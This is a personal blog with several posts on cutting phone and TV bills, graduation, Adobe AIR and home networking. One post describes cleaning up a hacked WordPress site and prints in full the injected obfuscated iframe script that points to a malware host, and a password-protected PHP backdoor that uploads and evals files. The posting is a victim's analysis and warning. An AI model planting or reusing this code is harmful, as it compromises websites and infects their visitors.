Brian's World

Upcoming Blog Series

I am going to change things up around here a little bit, or at least try to. I’m going to try to blog about some topics that are geared more towards the general public, and not always about me and things around me. While this might not seem to fit with the “Brian’s World” theme, the topics I will be focusing on are all areas that I do have lots of experience in… for example information technology in schools. The idea is to provide content that might do an even better job of helping a greater number of people based on my thoughts and experiences. I in no means plan to become one of those blogs that is entirely filled with technical stuff and nothing about me, but I would like to have a little variety. I’ve been wanting to share my views on some topics for quite some time, and instead of writing a book or whitepaper no one may ever read, I’ll blog about it in hopes a well crafted search engine may help direct someone here.

But before all that starts, there are some other things to talk about of course. I’ve been on this crusade lately to cut down on the cost of some technology related bills here in my family. For some time the Comcast Triple Play bundle for $99.99 has been advertised on TV. I always disregarded it, knowing it was likely for new customers only. The bundle includes digital TV, internet (they like to call it “High Speed Internet”), and digital voice (aka Voip). I’m on board with getting a discount for having both TV and internet from the same company, but switching to a voip based system isn’t something I’m completely comfortable with. I like knowing that if the power goes out, I have a landline phone that will probably still work. This mentality was thrown off when I added up the local and long distance bills (from different companies of course) and found we were spending close to $100 a month on phone service. It split down to around $30 for local, and $70 for long distance. This is outrageous. Sure, my mom uses the phone… but 500 long distance minutes shouldn’t be costing us $70! Time to bundle. Even if we can’t get the $99.99 deal, I hoped Comcast might be able to do something.

So I went online, because I like the internet, and tried to navigate the Comcast website. After placing an order for the bundle online I was thrown into a chatroom with the person who would be processing my order. He was very confused. I told him I choose the self installation kit, and he kept insisting that even though I was installing it myself, someone would need to come out anyways. I gave up on him and decided to call Comcast and see what the deal was. A few customer support reps later, I was told that I couldn’t get a bundle because I already had service.. and the web guy had messed everything up. I got them to delete it all, and I would call back later to figure out my plan.

I called back a day or two later, and was told my best option was a $129/month package for existing customers. It was the same bundle, with HBO & Stars… just not at that cheap price. $129 is much less than my $100 phone bill + $100 TV/Internet bill, so I went for it. They’ll be installing it in a little over a week, I wish it didn’t take them so long. I will definately updae on how this goes. I am confident there will be problems, as distribution point for phone and internet are very far apart.

I’m not wondering what bills I can look at next. With the rising price of fuel, reducing a monthly bill seems like a logical way to produce continued savings. There has been one cell phone bill which seems very high that I’d really like to look at, but its not the easiest to get. I will have to keep trying, and hoping to be brave or something.

Recently I’ve been making progress with my financial stuffs. I finally got Polish National Credit Union to activate my online banking… 3 weeks later. Of course it involved them wimping out and making me a new account, but whatever. Not I just have to entice my routing number out of them, so I can actually do something with it. What I’ll do I do not know. I might want to buy something, but I don’t know what. I know I need some stuff for my shoebox pc… but thats boring routine maintence. I would like to do something fun, but not something outrageous. I guess the question is where do I draw that line.

I’m gonna make lunch, and then do stuff… maybe assault a local Verizon Wireless store.

Virii Warning

Fast news coming down from my blog updates, if you’ve visited this site in Internet Explorer in the past week, there is a chance you may have gotten a virus. Instead of my usual writings, you would have found a blank page with nothing there. Firefox seems to be smart enough to know to avoid doing anything, but IE might have downloaded a bad file. The file would be in your temporary internet files, likely called wp-stats[1].htm. If you do feel you might have downloaded this virus, please run a virus scanning program. The symantec security response page is here with more information about the file (at least as my computer caught it).

Essentially several of my pages has some javascript inserted into them that generated an iframe to download files off another site. My first thought was SQL injection, because blogs tend to be susceptible to those types of things. phpMyAdmin yielded a clean database. I started going through all my files in ftp and found this strange chunk of code

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Essentially all that obfuscation is used to hide the iframe, and the real purpose of the javascript. I deleted it from all the files it was in (which was several) and started to figure out how they got there. I’m not 100% sure, but I did find several files that did not belong, all named like net_[wordpress filename].php. A good example is net_wp-comments.php. I opened that file up, and it was definately malicious… it would take a file sent from a form and write that file to the current directory.

<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

define('PASSWD','46fe61e5238b5a873dab30ace493d58d');

function say($t) {
echo "$t\n";
};

function testdata($t) {
say(md5("mark_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
$HTTP_POST_FILES["s"]["size"])) {
if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
{
testdata('save_ok');
};
//eval($code);
} else {
testdata('save_fail');
};

if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
testdata('ok');
} else {
testdata('fail');
};

} else {
testdata('pass');
};

testdata('end');
echo "</pre>";
?>

???????? ????? ????????
I imagine once one of these got in, it was used to write several other copies. I also found a “hidden” directory serving what looked like search engine gaming stuff. I put hidden in quotes because my filezilla didn’t understand the . in the name meant to hide it.. but I caught it. I think we’re clean for now. If your blog is sending people to a blank page, and you can see your browser status bar connecting to wp-stats-php.info, you are infected. I would turn off your index.php page (rename it to something else so people can’t get to your site) and scour every file for the malicious javascript. I found all the files modified at the same date/time, and the code was always at the bottom of a php file. I would also look for any files that don’t belong in a wordpress install, like having a net_wp-stat.php in addition to the wp-stat.php. If you open those files up in a text editor and scrol down (the text is placed very far down, close to the middle) you’ll see lots of lines that start with @, which turns any error logging or output off. You’ll want to delete those files. Mine looked like it has some password protection on it (http authentication) where the hash was “dc696e9e1af6d06e67a526de29b37e54”. The safest way to address this may be to backup your datebase, blow away your wordpress install, and start from scratch. If you’re like me and lack a backup, try to clean any files in wp-admin, as well as your wp-config files, and see if you can generate a backup/export from your admin interface. Use firefox when you do this! It looked like the file uploaders joined my directories back in april (or so the modified date indicates), but they weren’t used until Friday to overwrite my content.

In others news, SHHS had their graduation yesterday. Congraduations to all those who graduated. I am confident you did a great job! The speeched were pretty bad, especially the class presidents and the retiring principal from the middle school. They both had good things to say, and plenty of nice closing lines. Unfortunately there were too many closing lines per speech, I cannot tolerate more than 1 or 2 closings. Any more than that and I get very frustrated at your attempts to trick me into applauding. You might think your speech is that good, but its probably not. It didn’t help that there was a fire alarm going off in the building behind the graduation site.. at least the fire trucks tried to come quietly.

I had other news to share I think, but I am tired.

Upcoming Graduation

Life has been moderately busy for me. I am slowly adjusting to the 8-5 job, maybe this week I will start taking a little time off or something. There is certainly lots to get done, and just not enough hours in the day to do it in.

I spent some time playing around with Adobe AIR today. Overall I’m not as impressed as I wanted to be. I was hoping for something very similiar to Dashcode (I have no clue why), and maybe Adobe AIR can do that… I probably just need a good IDE or something, dashcode is a pretty good IDE for widget making on OS X once you learn the tricks.

Facebook might be open sourcing a bunch of their stuff, in what looks like an attempt to throw some weight against the Open Social alliance. Kudos to the first people who figure out how to integrate the two of them. I am one person, and would really enjoying having one social graph and one common social scene online. Right now facebook does a good job with everything on their site, but it would be naive of me to bank on facebook being the best site for the rest of my life. Who knows, maybe LinkedIn will be my preferred network at some point.

No real updates at work. I am an expert at sitting in my chair. I did some pasting with ASP.net today, and I was glad to see it picked up where ASP left off. I’m not sure the extent to which I’ll be able to use it, but anywhere I can pick up added functionality would be nice. Working in a smaller company is very different from last year at MM. I enjoyed getting lost on my way to the bathroom, or having a cafeteria to go get decent food at. I would say I was much busier at MM, but not doing such technical tasks… overall I’m not sure if I can say which one is better yet, they both are different.

I do apologize if my typing skills have been off with this blog. I’m on my linux box, where the monitor is to the left of my head. Not very comfortable, but a nice change from staring straight ahead all day. Sometimes I print things out just to look at a different surface. I know, I know, I’m killing trees. At least I use the other side for note taking and stuff.

I spent a ton of time battling with my home network over the past few days. I was trying to install World of Warcraft on my laptop (Wine will come later) and the download speeds were terrible. Something like 50Kb/s to get a 3.5 GB file. I played with QoS on my DD-WRT WRT54G and got a little improvement, but nowhere near what I wanted. I ended up turning off the P2P functionality of the Blizzard Downloader, and then it soared. I’m not sure if Comcast disliked my bittorrent traffic, or my port triggering wasn’t working right. Whats wierd is the fact it would go very fast for a few seconds with P2P enabled, and then cripple… like someone had caught on to what I was doing. Who knows, I downloaded it by now. You can track my character here. I am aware I need to “respec” or do something like that, but I play wierd.

Kevin, Katie, and the rest of the SHHS Class of 2008 are graduating soon and I need to get them gifts. I think Katie’s gift is all set, but my brother is a more challenging person to shop for. He has plenty of socks, iTunes Gift cards, and food so I am not sure what to get him. Something for sure.. Katie actually bought 2 somethings. 1 was a little plant in an egg (at least that was what it looked like), and the other was some type of “bling” item. It might go around your neck, but it looked like it could be used to tow a boat or something as well. Those gang members really know how to go multi-purpose. If you do have any gift ideas, email them to me… my brother is capable of reading english and surfing the net, so he might read your public comments below.

I am going to go brush my teeth now. They are sore.

Good night moon.